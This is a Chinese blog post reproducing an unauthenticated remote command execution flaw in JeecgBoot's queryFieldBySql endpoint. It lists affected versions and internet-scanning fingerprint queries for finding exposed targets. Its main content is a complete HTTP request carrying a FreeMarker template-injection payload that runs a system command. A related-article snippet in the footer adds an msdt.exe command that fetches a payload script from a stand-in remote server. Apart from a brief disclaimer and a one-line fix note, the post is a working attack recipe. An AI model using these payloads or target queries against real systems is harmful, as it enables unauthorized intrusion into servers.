【漏洞复现】JeecgBoot-queryFieldBySql-远程命令执行漏洞

已于 2024-03-19 13:00:28 修改
阅读量1.1k 收藏 9
点赞数 16
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-03-18 21:48:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136813502
版权

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

Jeecg-Boot中存在SQL注入漏洞,远程未授权攻击者可通过report/jeecgboot/jmreport/queryFieldBySql端点来执行任意SQL语句,最终可能导致敏感信息泄露等。

影响范围

  • 3.0.0 <= jeecg-boot <= 3.5.3
  • 2.4.x <= jeecg-boot <= 2.4.6

资产测绘

FOFA:

app="JEECG"

Hunter:

app.name="JeecgBoot"

image

漏洞复现

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 58

{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\") }'","dbSource":"","type":"0"}

image

修复建议

1、目前官方已发布漏洞修复版本,建议用户升级到安全版本:http://www.jeecg.com/

Nday_Seeker
关注
  • 16
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 2202
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
jeecg信息泄露+文件上传=》RCE
公众号shadow sock7
03-19 4705
创建jeecg数据库,然后执行命令: create database /jeecg; source /Users/xxx/repos/jeecg-master/docs/jeecg_3.8_mysql.sql
jeecg-boot/jmreport 积木报表基于SSTI的任意代码执行漏洞、PostgresQL JDBC Drive 任意代码执行漏洞(CVE-2022-21724)
geniusbluesky的博客
12-13 809
在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。pgjdbc 根据通过 authenticationPluginClassName、sslhostnameverifier、socketFactory 、sslfactory、sslpasswordcallback 连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。
漏洞复现Jeecg-boot SQL注入/命令执行
qq_45276174的博客
05-14 873
【代码】【漏洞复现Jeecg-boot SQL注入/命令执行
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
fly夏天的博客
03-20 3553
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞
HMX404的博客
04-15 937
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
【严重】jeecg-boot/积木报表基于SSTI的任意代码执行漏洞
murphysec的博客
08-17 1315
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。官方已发布补丁:https://github.com/jeecgboot/jeecg-boot/commit/acb48179ab00e167747fa4a3e4fd3b94c78aeda5。
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
最新发布
LiangYueSec的博客
07-02 914
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
漏洞复现JeecgBoot-qurestSql-SQL注入漏洞
Nday_Seeker
03-18 1630
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入。
JEECG-BOOT存在SQL注入漏洞[附POC]
Liyu_6618的博客
02-01 1339
JEECG-BOOT存在SQL注入漏洞[附POC]
Jeecg-Boot qurestSql-SQL注入漏洞
weixin_43567873的博客
03-11 184
Jeecg-Boot qurestSql-SQL注入漏洞
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 1700
JeecgBootjeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
jeecg 远程命令执行漏洞 以及Handler dispatch failed; nested exception is java.lang.NoSuchMethodError: ne
weixin_60948956的博客
04-07 593
Jeecg Boot jmreport/queryFieldBySal接口存在Freemarker 模板注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。JimuReport v1.6.1 版本发布,修复 Freemarker 模板注入高危漏洞。升级最新版本启动成功,系统登录不上去,登录就退出!
jeecg-boot queryFieldBySql接口基于SSTI的任意代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-10 405
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
nbcio-boot3.1 解决积木报表基于SSTI的任意代码执行漏洞,积木报表版本从1.4.0升级到最新的1.6.1
宁波阿成的博客
08-17 785
nbcio-boot3.1 解决积木报表基于SSTI的任意代码执行漏洞,积木报表版本从1.4.0升级到最新的1.6.1
Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现
weixin_45908624的博客
09-11 2901
JeecgBoot 前台接口SQL注入漏洞
CVE-2023-1454:Jeecg-Boot SQL注入漏洞复现
薛定谔嘚喵博客
09-15 1151
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api 接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】
holyxp的博客
07-02 4761
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
Jeecg-Boot 未授权SSTI注入
qq_27536045的博客
08-18 826
JDK: 1.8+ (小于11)
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值